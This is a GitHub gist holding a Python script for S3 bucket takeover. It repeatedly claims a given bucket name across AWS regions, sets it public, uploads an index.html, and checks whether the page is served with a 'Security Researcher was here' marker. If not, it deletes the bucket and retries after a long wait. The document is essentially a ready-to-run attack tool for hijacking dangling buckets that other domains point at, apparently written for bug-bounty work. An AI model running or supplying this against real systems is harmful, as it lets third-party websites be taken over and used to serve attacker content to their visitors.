Created
December 13, 2020 23:21
-
-
Save arbazkiraak/43615eab791fe10b5db105f3d1288978 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
import boto3,sys,time,requests | |
import botocore.exceptions | |
from urllib3.exceptions import InsecureRequestWarning | |
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning) | |
import datetime,os | |
os.environ['AWS_DEFAULT_REGION'] = 'us-east-1' | |
s3 = boto3.resource('s3') | |
s3bucket = sys.argv[1] | |
DELETE_WAIT_CONFLICT_TIME = 4800 | |
regions = ['us-east-1','us-west-1','ap-southeast-1','ap-east-1','ap-northeast-1','us-east-2','us-west-2','ap-northeast-2','cn-north-1','eu-west-3','eu-west-2','ca-central-1','ap-south-1','ap-northeast-3','af-south-1'] | |
def check_req(bucket_name): | |
req = requests.get('http://{}'.format(bucket_name),verify=False) | |
text = req.text | |
if 'Security Researcher was here' in text: | |
print("[DONE] ",bucket_name) | |
return True | |
elif 'NoSuchWebsiteConfiguration' in text: | |
print("[DONE] ",bucket_name) | |
return True | |
elif 'The specified bucket does not exist' not in text and 'region' not in text and 'endpoint' not in text: | |
print("[!!] Something Happened : ",bucket_name) | |
return True | |
else: | |
return False | |
return False | |
def create(bucket_name,region): | |
try: | |
location_region = {'LocationConstraint': region} | |
if region != 'us-east-1': | |
bucket = s3.create_bucket(Bucket=bucket_name,CreateBucketConfiguration=location_region) | |
else: ## https://github.com/boto/boto3/issues/125 | |
bucket = s3.create_bucket(Bucket=bucket_name) | |
bucket.Acl().put(ACL='public-read') | |
s3.Object(bucket_name,'index.html').put(Key='index.html',Body=open('index.html','rb'),ContentType='text/html',ACL='public-read') | |
print("[+] CREATED : ",datetime.datetime.now(),bucket_name,region) | |
return True | |
except Exception as e: | |
if "conflicting conditional" in str(e): | |
print("[-] need waiting : ",datetime.datetime.now(),bucket_name,region) | |
return False | |
else: | |
print(e) | |
def delete(bucket_name,region): | |
bucket = s3.Bucket(bucket_name) | |
bucket.objects.all().delete() | |
bucket.delete() | |
print("[-] DELETED : ",datetime.datetime.now(),bucket_name,region) | |
CREATED = False | |
def main(): | |
global CREATED | |
for each_region in regions: | |
CREATED = False | |
while not CREATED: | |
is_created = create(bucket_name=s3bucket,region=each_region) | |
if is_created: | |
CREATED = True | |
time.sleep(180) | |
takeover_done = check_req(s3bucket) | |
if takeover_done is True: | |
sys.exit(1) | |
else: | |
delete(s3bucket,each_region) | |
time.sleep(DELETE_WAIT_CONFLICT_TIME) | |
main() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment